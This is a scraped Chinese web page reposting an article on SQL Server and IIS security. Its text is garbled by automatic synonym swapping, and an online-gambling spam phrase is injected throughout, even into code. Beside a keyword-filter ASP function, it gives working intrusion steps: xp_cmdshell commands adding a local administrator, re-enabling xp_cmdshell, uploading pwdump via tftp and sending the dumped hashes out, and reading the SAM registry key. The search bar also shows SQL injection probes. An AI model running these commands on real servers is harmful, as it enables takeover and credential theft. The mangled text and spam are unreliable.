快捷搜索:  as  test  1111  test aNd 8=8  test++aNd+8=8  as++aNd+8=8  as aNd 8=8

网赌新浦金可靠吗:调整重心 从IIS到SQL Server数据库安全(1)SQL Server数据库



从Codered到Nimda等,一大年夜堆蠕虫把原本必要人工使用的破绽都变成了法度榜样自动使用了,大年夜家还想去手工操作这些IIS破绽么?让我们调剂重心,去看看办事器常用的数据库吧。

一样平常网站都是基于数据库的,分外是ASP、PHP、JSP这样的用数据库来动态显示的网站。很多网站可能多留意的是操作系统的破绽,然则对数据库和这些脚本的安然老是轻忽,也没有太多留意。

该文章对从SQL脚本问题说得异常具体。对付脚本安然的办理,也可以经由过程过滤来实现,可以参考我曩昔写的。对付ASP来说,可以应用下面这个过滤函数:

Function Filter_SQL(strData)

Dim strFilter

Dim blnFlag

Dim i

strFilter="',;,//,--,@,_,exec,declare"

'必要过滤的字符,可以自己添加,","是分隔符

blnFlag=Flase'过滤标志,假如孕育发生过滤,那么便是真

Dim array网赌新浦金可靠吗Filter

arrayFilter=Split(strFilter,",")

For i=0 To UBound(arrayFilter)

If Instr(strData,arrayFilter(i))>0 Then

blnFlag=True

Exit For

End If

Next

If blnFlag Then

Response.Redirect "wrong.asp"

'当发明有过滤操作时,导向一个预定页面。

反正正常造访用不到的连接哀求,总不是好工作。

Else

Filter_SQL=strData

End If

End Function

对付SQL Server数据库来说,安然问题不仅仅局限在脚本上了。微软的系统性很强,全部基于Windows系统的利用都有很强的关联性,对SQL Server来说,基础可以把数据库治理和系统治理等同起来了。SQL Server默认的治理员账号“sa”的密码是空的,这给多半NT办事器孕育发生一个安然破绽。“SQLRCMD”,就能够使用得到的数据库治理员账号履行系统敕令。

在SQL Server中有很多系统存储历程,有些是数据库内部应用的,还有一些便是经由过程履行存储历程来调用系统敕令。

系统存储历程:xp_cmdshell。

便因此操作系统敕令行说冥器的要领履行给定的敕令字符串。它就详细语法是:

xp_cmdshell {'command_string'} [, no_output]

xp_cmdshell在默认环境下,只有 sysadmin 的成员才能履行。然则,sysadmin也可以赋予其他用户这个履行权限。在早期版本中,得到 xp_cmdshell 履行权限的用户在 SQL Server 办事的用户帐户中运行敕令。可以经由过程设置设置设备摆设摆设选项设置设置设备摆设摆设 SQL Server,以便对 SQL Server 无 sa 造访权限的用户能够在SQLExecutiveCmdExec Windows NT 帐户中运行 xp_cmdshell。在 SQL Server 7.0 中,该账户称为 SQLAgentCmdExec。现在对付SQL Server2000,只要有一个能履行该存储历程的账号就可以直接运行敕令了。

对付 NT 和 WIN2000,当用户不是 sysadmin 组的成员时,xp_cmdshell 将模拟应用 xp_sqlagent_proxy_account 指定的 SQL 网赌新浦金可靠吗Server 代理法度榜样的代理帐户。假如代理帐户不能用,则 xp_cmdshell 将掉败。以是纵然有一个帐户是master数据库的db_owner,也不能履行这个存储历程。网赌新浦金可靠吗

假如我们有一个能履行xp_cmdshell的数据库账号,比如是空口令的sa账号。那么我们可以履行这样的敕令:

exec xp_cmdshell 'net user refdom 123456 /add'

exec xp_cmdshell 'net localgroup administrators refdom /add'

上面两次调用就在系统的治理员组中添加了一个用户:refdom

当我们得到数据库的sa治理员账号后,就应该可以完全节制这个机械了。可见数据库安然的紧张性。

下面这些存储历程都是对Public可以履行的:

Use master

Select sysobjects.name From sysobjects, sysprotects

Wher网赌新浦金可靠吗e sysprotects.uid = 0 AND xtype IN ('X','P') A

ND sysobjects.id = sysprotects.id

加强数据库的安然是异常紧张的,有的数据库办事器是和WEB办事器隔脱离的,这就同MAIL办事器一样,数据库的日志可能就基础很少去查看,这将会成为治理员的一个纰漏点。类似DNS、MAIL等等,数据库办事器每每成为各类入侵的跳板。

办理数据库的问题和技术:

1、得到SA权限后,却不能履行xp_cmdshell存储历程怎么办?

答:可能是已经把xp_cmdshell等扩展存储历程删除了,可以用这个存储历程把xp_cmdshell规复sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'。

2、经由过程数据库用pwdump得到系统治理员密码:

先上传一个pwdump:

tftp -i GET pwdump3.exe pwdump3.exe

tftp -网赌新浦金可靠吗i GET lsaext.dll lsaext.dll

tftp -i GET pwservice.exe pwservice.exe

pwdump3 127.0.0.1 outfile.txt

tftp PUT outfile.txt outfile.txt

然后再用解密对象l0pht等等破解这些密码。

3、从数据库读取系统治理员密码:

能读出加密的密码是NT的“administrator”账号也不能做的,SQL Server能读出来是应用的“LocalSystem”账号,这个账号比administrator更高一级。可以应用下面这个存储历程。不过读出来的密码是颠末加密后的,然后再解密:

xp_regread 'HKEY_LOCAL_MACHINE','SECURITYSAMDomainsAccount','F'

免责声明:以上内容源自网络,版权归原作者所有,如有侵犯您的原创版权请告知,我们将尽快删除相关内容。

您可能还会对下面的文章感兴趣: